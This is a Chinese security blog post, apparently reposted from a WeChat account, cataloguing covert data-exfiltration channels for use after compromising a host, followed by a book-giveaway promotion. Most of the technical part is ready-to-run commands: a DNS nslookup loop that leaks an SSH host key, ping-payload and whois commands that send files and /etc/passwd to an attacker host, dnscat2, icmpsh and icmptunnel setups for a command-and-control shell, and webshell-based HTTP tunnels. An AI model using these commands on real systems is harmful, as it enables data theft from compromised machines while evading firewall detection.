【文末送书】攻防之数据回传通道总结

admin 2021年8月27日03:43:51评论39 views字数 4872阅读16分14秒阅读模式

前言


攻陷目标主机之后并不意味着就不用再和防火墙斗智斗勇,数据回传的过程仍然有可能被防火墙发现和阻止,所以我们要根据实际情况选择更隐秘的方式传出文件。本文总结了常用的数据传出方式,将持续更新。

应用协议

利用http.server回传

1
2
3
4
5
6
python2:
python -m SimpleHTTPServer
python3:
python -m http.server
php:
php -S 0.0.0.0:8888

利用ftp回传

1
2
service vsftpd start
访问ip:21

利用smb回传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cd /etc/samba
vi smb.conf
文件内添加:
[share]
path =/home/share
available = yes
browsealbe = yes
public= no
writable = yes
cd /home
mkdir share
chmod -R 777 share
useradd share
smbpasswd -a share
service smbd restart
访问\ip

利用scp回传

1
scp localfilename [email protected]:filename

DNS隧道

1.命令行

1
for i in $(xxd -p -c 10 ssh_host_ecdsa_key);do sleep 1s && nslookup $i.xxx.com xx.xx.xx.xx;done

2.dnscat2、dns2tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
攻击机(server):
安装
apt-get install ruby ruby-dev git make g++ rubygems
gem update --system
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
设置一个NS记录指向自己的子域名,再设置一个A记录指向自己部署server端的服务器地址,运行
ruby ./dnscat2.rb dns.uuzdaisuki.com --no-cache

受害者(linux)安装
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
受害者(windows)安装
https://downloads.skullsecurity.org/dnscat2/ 下载win32.zip的dnascat2后解压

将server中产生的secret复制下来,运行
./dnscat --dns domain=dns.uuzdaisuki.com --secret=xxxxxxxxxxxxxxxxxxxxx
session -i 1

详情参考:

http://next.uuzdaisuki.com/2018/08/07/%E5%88%A9%E7%94%A8DNS-Tunnel%E4%BC%A0%E8%BE%93%E6%95%B0%E6%8D%AE/

ping隧道

1.命令行

1
cat a.txt | xxd -p -c 1|xargs -n 1 -I '{}' ping -c 1 -s 56 -p '{}' xx.xx.xx.xx

2.pingtunnel

1
2
3
4
5
6
7
http://www.cs.uit.no/~daniels/PingTunnel/
ptunnel -p 192.168.100.232 -lp 8888 -da 192.168.118.131 -dp 3389
-p 指定ICMP隧道另一端的IP
-lp:指定本地监听的端口
-da:指定要转发的目标机器的IP
-dp:指定要转发的目标机器的端口
-x:指定连接密码

3.icmpsh展开cc通道:

1
2
3
4
5
6
7
8
9
攻击者机器部署icmpsh:
git clone https://github.com/inquisb/icmpsh.git
sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh
syntax: ./icmpsh_m.py <attacker’s-IP> <target-IP>
./icmpsh_m.py 192.168.1.108 192.168.1.106
受害者机器:
syntax: icmpsh.exe -t <Kali IP>
icmpsh.exe -t 192.168.1.108

4.icmptunnel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
受害者主机:
安装icmptunnel
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
禁用ICMP echo回复
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
服务端模式启动icmptunnel,并且给新的隧道接口分配一个IP地址
./icmptunnel -s
Ctrlz
bg
/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
ifconfig

攻击者主机:
安装icmptunnel
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
禁用ICMP echo回复
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
运行
./icmptunnel 192.168.1.108
ctrl z
/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

http隧道

1.reGeorg

1
2
3
4
5
6
7
git clone https://github.com/sensepost/reGeorg.git
pip install urllib3
将对应页面上传到目标服务器上
并在本地监听
python reGeorgSocksProxy.py ‐p 8080 ‐l 192.168.1.5 ‐u
访问目标
http://192.168.1.119/tunnel.aspx

2.ABPTTS

1
2
3
4
5
6
7
8
9
10
11
安装
apt-get install python-dev build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev python-pip
pip install pycrypto
git clone https://github.com/nccgroup/ABPTTS.git
cd ABPTTS/
生成payload
python abpttsfactory.py ‐o webshell
传到目标靶机
端口转发
python abpttsclient.py ‐c webshell/config.txt ‐u "http://192.168.1.119/abptts.aspx" ‐f 192.168.1.5:33389/192.168.1.119:3389
让攻击机的33389端口流量转发到3389,通过HTTPS服务

whois隧道

1
2
3
4
失陷机:
root@kali:~# whois -h x.x.x.x -p 4444 `cat /etc/passwd | base64`
接受机:
root@kali:/tmp# nc -l -v -p 4444 | sed ""s/ //g"" | base64 -d

社交平台或工具

利用腾讯qq、微信等工具回传

代码托管

利用github回传

1
2
3
4
5
6
7
8
9
10
通过一个匿名邮箱注册github账户,并创建一个空仓库
mdkir upload
cd upload
git config --global user.name “user.name”
git config --global user.email “user.email”
git clone https://github.com/xxx/xxx.git
cp -r file upload
git add *
git commit -m "update"
git push -u origin master

云储存

利用百度网盘等网盘类工具回传

邮件

利用邮件外发回传

作者:Leticia,文章转自Leticia’s Blog



今日赠书福利

【文末送书】攻防之数据回传通道总结

一:Python量化金融编程从入门到精通

    量化交易领域的飞速发展,得到了越来越多业内外人士的关注。而Python作为一门功能强大且易于上手的编程语言,可以快速将想法付诸实践。因此,本书希望可以引领读者初步了解量化交易,并借助Python这个工具在该领域有所建树。

    本书先从量化交易的基本概念讲起,然后讲解Python的基本语法及常见库的使用,在每章节的学习中都以金融量化为实例,并在后结合实战项目来进行学习和巩固,读者不但可以系统地学习Python编程的相关知识,而且还能学习到Python在量化交易场景下的应用。

本书内容通俗易懂,案例丰富,适合零基础并对Python量化感兴趣的读者,以及想学习量化交易实战项目的Python初学者。此外,本书也适合作为相关培训机构的培训教材。


二:Python编程完全自学教程

    本书共分5篇,第1篇为入门篇(1章~5章),讲解了Python编程的基础知识,包括Python简介与安装、基本语法、常用语句与运算、字符串、列表、元组、字典与集合等;第2篇为进阶篇(6章~10章),讲解了Python编程的进阶知识,包括函数、模块与包的应用、文件操作、异常处理、面向对象编程等;第3篇为高级篇(11章~16章),讲解了Python编程的相关高级应用知识,包括时间和日期、正则表达式、多任务编程、网络编程、数据库等;第4篇为爬虫应用篇(17章~18章),主要讲解了Python在网络数据采集、页面内容提取等爬虫相关的技术知识;第5篇为Web开发篇(19章~20章),主要讲解了Django框架与Flask框架的应用,帮助读者掌握Web开发技术。


三:机器学习入门:基于数学原理的Python实战

    机器学习是一门涉及高等数学、线性代数、概率论、统计学和运筹学等领域的交叉学科。机器学习的基础就是数学,这也就要求学习者要有良好的数学基础。为了降低机器学习的学习门槛,本书深入浅出地对机器学习算法的数学原理进行了严谨的推导;并利用Python 3对各种机器学习算法进行复现,还利用介绍的算法在相应数据集上进行实战。本书主要内容包括机器学习及其数学基础;线性回归、局部加权线性回归两种回归算法;Logistic回归、Softmax回归和BP神经网络3种分类算法;模型评估与优化;K-Means聚类算法、高斯混合模型两种聚类算法和一种降维算法——主成分分析。

    《机器学习入门:基于数学原理的Python实战》理论性与实用性兼备,既可作为初学者的入门书籍,也可作为求职者的面试宝典,更可作为职场人士转岗的实用手册。本书适合需要全面学习机器学习算法的初学者、希望掌握机器学习算法数学理论的程序员、想转行从事机器学习算法的专业人员、对机器学习算法兴趣浓厚的人员、专业培训机构学员和希望提高Python编程水平的程序员。

【文末送书】攻防之数据回传通道总结

     为了感谢大家一直以来的关注与支持,会有书籍免费赠送【文末送书】攻防之数据回传通道总结,中奖者可以从上述书籍中任选一本。

     规则如下:

     1.  本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。

     2. 公众号内发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖

     3. 中奖者不满足条件1,视为放弃中奖资格。

     4. 活动截止时间为8月26日 18:00点,到时候还要中奖者及时联系号主留下你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!


先点“再看”,然后点击下方公众号私聊发送“抽奖” 即可马上扫描参与抽奖【文末送书】攻防之数据回传通道总结

本文始发于微信公众号(LemonSec):【文末送书】攻防之数据回传通道总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日03:43:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【文末送书】攻防之数据回传通道总结http://cn-sec.com/archives/471258.html

发表评论

匿名网友 填写信息